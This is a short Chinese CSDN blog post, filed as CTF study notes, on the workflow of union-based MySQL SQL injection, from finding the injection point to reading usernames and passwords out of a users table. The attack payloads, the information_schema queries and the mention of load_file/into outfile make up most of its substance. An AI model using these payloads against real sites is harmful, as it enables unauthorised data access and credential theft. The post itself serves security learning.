SQL入流程

最新推荐文章于 2023-08-17 19:10:07 发布
最新推荐文章于 2023-08-17 19:10:07 发布
阅读量141 收藏
点赞数
分类专栏: CTF 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44796285/article/details/109729411
版权

  1. 注释或闭合语句
    闭合语句后通过查询语句来爆出信息

    注释语句确保语句的正确执行

  2. 验证
    通常用and进行验证

    id=1'and 1=1
id=1'and 1=2

    若第一句输入后页面正常,第二句输入后出现错误信息则证明包含注入点

  3. 查询字段数目
    MySQL使用order by来确认字段数目

    ?id=1'and order by 3 --+

    观察页面是否显示正常,来判断字段个数

  4. 联合查询
    通过union select联合查询来爆出字段

    ?id=1-'union select 1,2,3

    在爆出的字段值里面可以替换为我们的恶意语句,前期主要是收集信息

  5. 收集信息
    在爆出的字段值里面可以替换为我们的恶意语句,前期主要是收集信息

    数据库名:database()
数据库版本: version()
数据库用户: user()
操作系统: @@version_compile_os
数据库路径:   @@datadir
系统用户名: system_user()
当前用户名: current_user
连接数据库的用户名:session_user()
读取数据库路径:@@datadir
MYSQL安装路径:@@basedir
load_file 转成16进制或者10进制 MYSQL读取本地文件函数
into outfile 写入函数

    比较重要的数据库

    information_schema 数据库下的 schemata表中的schema_name记录的是各个数据库的名称
information_schema 数据库下的 tables表中的table_name记录的是各个数据表的名称
储存所有表名信息的表 : information_schema.tables
表名 : table_name
数据库名: table_schema
列名 : column_name
储存所有列名信息的表 : information_schema.columns

    查询数据库名

    id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

    查询列名

    id=1′ and 1=2 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’ –+ 查询列名

id=1′ and 1=2 UNION SELECT 1,2,group_concat(id,username,password) from users –+ 查询字段值

    查询字段值

    id=1′ and 1=2 UNION SELECT 1,2,group_concat(id,username,password) from users –+ 查询字段值
披着蓑衣的烟雨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL基本操作:连接sql服务器,进到自己的库中,对库进行操作
Evil_king_eye的博客
09-15 492
明确几个概念,以管理员身份运行,先进的是mysql的服务器,用自己的user的用户名和密码,之后进到此用户的mysql库,在自己的库中进行操作,这些步骤都是必须有的。 开启Mysql 第一步: 启动服务:net stop mysql【不用加;】 C:\Windows\system32>net start mysql MySQL 服务正在启动 … MySQL 服务已经启动成功。 第二步: 进SQL中:mysql -u root -p 会有输密码:***** C:\Windows\syst
连接SQL Server 数据库
qq_53317005的博客
11-22 1万+
保姆式教学,如何快速连上SQL Server 数据库
一、进sql环境,以及sql的查询、新建、删除、使用
2301_79149013的博客
08-17 1262
use [数据库名]
怎样开启SQL数据库服务
weixin_34067049的博客
04-09 1154
使用数据库时开启服务是需要的,我给大家具体介绍几种方式开启服务。这几种我都用图文的形式用三个开启方式给你展示,对于不会开启服务的朋友可以学习下,这些前提是你的电脑安装了SQL数据库,否者无法使用数据库。找到SQL Sever服务。在计算机管理框里找到Sql sever配置管理器找到Sql Sever服务打开服务,右键点击服务,这里要看清楚什么才是服务,服务器的图标是一个库的样...
数据库(sql)常见命令(1)
qq_66768033的博客
08-28 1620
示例:create table t_student(`id` int(255),`name` varchar(255)........ )示例:alter table student change id t_id int(255)示例:alter table student modify id varchar(255)6.修改表名:alter table 旧表名(之前存在或者自己创建的表名称) rename as 新表名。10.删除数据库表名:drop table 表名。...
MyBatis执行Sql流程实例解析
08-25
MyBatis执行Sql流程实例解析 MyBatis是Java持久层框架,它提供了一个映射关系使得Java方法可以执行SQL语句。MyBatis执行Sql流程实例解析是了解MyBatis框架的核心机制。下面我们将通过示例代码来详细介绍MyBatis...
OA流程节点操作组条件SQL
09-19
泛微OA流程操作组中条件sql查询,查询流程中所有设置过的条件:(字段名包括:流程名称 节点名称 类型名称 协办人条件 批次);
SQL开发的基本流程.doc
04-02
SQL开发流程主要包括以下步骤: 需求分析和评估:在开始SQL开发之前,首先需要对项目的需求进行深分析,了解需要实现的功能和目标。同时,评估项目的复杂性和风险,以便制定合理的开发计划。 设计数据库结构:...
oracle sql执行过程(流程图)
09-10
Oracle SQL执行过程是一个复杂而精细的流程,它涉及到多个阶段,确保查询语句能够高效、准确地执行。以下是对这个过程的详细解析: 1)**语法分析**: 在SQL语句被提交给数据库引擎后,首先进行的是语法分析。这个...
泛微系统SQL语句大全
12-29
本资源集合了泛微系统中与SQL Server数据库交互时常用的各种SQL语句,涵盖了组织架构、流程管理以及自定义需求等多个方面。以下是对这些SQL语句知识点的详细解释: 1. **组织架构相关SQL**: - 组织架构是企业信息...
Oracle常见的sql命令
m0_51613816的博客
10-24 8828
Oracle常见的sql命令详解
Oracle里 用sql*plus 登陆时,用户名和密码是多少啊?
dengwan3818的博客
09-30 3692
Oracle里sql*plus的用户名即system用户,密码是自己设置的密码。 如果密码忘记,可通过如下方法重置。 1、win键+R键,输cmd,打开命令提示符。 2、输sqlplus /nolog 3、继续输conn /as sysdba 4、输alter user 用户名 identified by 密码; 5、修改成功后,会有上图“用户已更改”的...
张小白的渗透之路(六)——SQL的思路、流程SQL的CONCAT系列函数、Information_schema数据库讲解
Litbai_zhang
10-31 2025
前言 关于SQL理论的内容,小白之前的博客有写,有兴趣的可以去看一看哦~SQL原理详解 实践 ps: 实验的环境小白用的sqli-labs的第一关,下面让我们开始吧 第一关呢提示我们可以用数字型的注就可以过啦 我们在url输 ?id=1 结果显示通关啦 当然,小白的目的不是写通关攻略,所以接下来让我们继续以这个例子来更深的理解一下SQL的思路。 那么比方说我现在想获取的是数...
连接SQL Server数据库(详细步骤+登录注册案例)
热门推荐
weixin_43624549的博客
08-16 7万+
SQL Server使用sql server身份验证,方便与编写的程序连接 <1> 首先使用Windows登录进去,右键实例,点击属性,再选择安全性,将该选项卡中的服务器身份验证改为sql server和windows身份验证模式。点击确定 <2> 此时重新登录数据库,OK,又失败了。。。 失败的提示是: 已成功与服务器建立连接 但是在登录过程中发生错误。 provider 共享内存提供程序 error 0 管道的另一端上无任何进程。 <3> 不要慌,淡定,打开SQL S
如何进数据库
qq_42440919的博客
06-12 1万+
打开cmd进安装的bin目录下运行mysql -hlocalhost -uroot -p回车要求输密码,没有直接回车show databases;(一定要加分号,显示库)use his;(切换到哪个库)show tables;(显示所有表格)...
oracle的SQL*PLUS界面
weixin_33908217的博客
11-12 2621
之前安装了oracle,但是第一次安装后,就是不知道怎么输用户名和密码进到里面,现在教你如何进oracle执行相应的命令 解决ora-280000 the account is locked的问题: 开始-->运行-->cmd 进行DOS界面 输sqlplus.exe / as sysdba; SQL>alert us...
MySQL的两种方法
qq_45313604的博客
07-14 4万+
1.打开MySQL 5.5 Command Line Client,输密码即可进 2.打开cmd命令窗口,输mysql -u__ -p__ u:用户名 p:密码 如mysql -uroot -p123456回车可直接数据库 若不想让别人看到自己的密码,可输mysql -uroot -p回车,再键密码 注:如有侵权,请联系删除! ...
Hive SQL执行流程
最新发布
06-29
Hive SQL的执行流程通常包括以下几个步骤: 1. **解析(Parsing)**: 当用户提交Hive SQL语句时,Hive首先会通过词法分析器将其分解为可理解的语法结构。 2. **编译(Compiling)**: Hive将解析后的语法树转换为...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值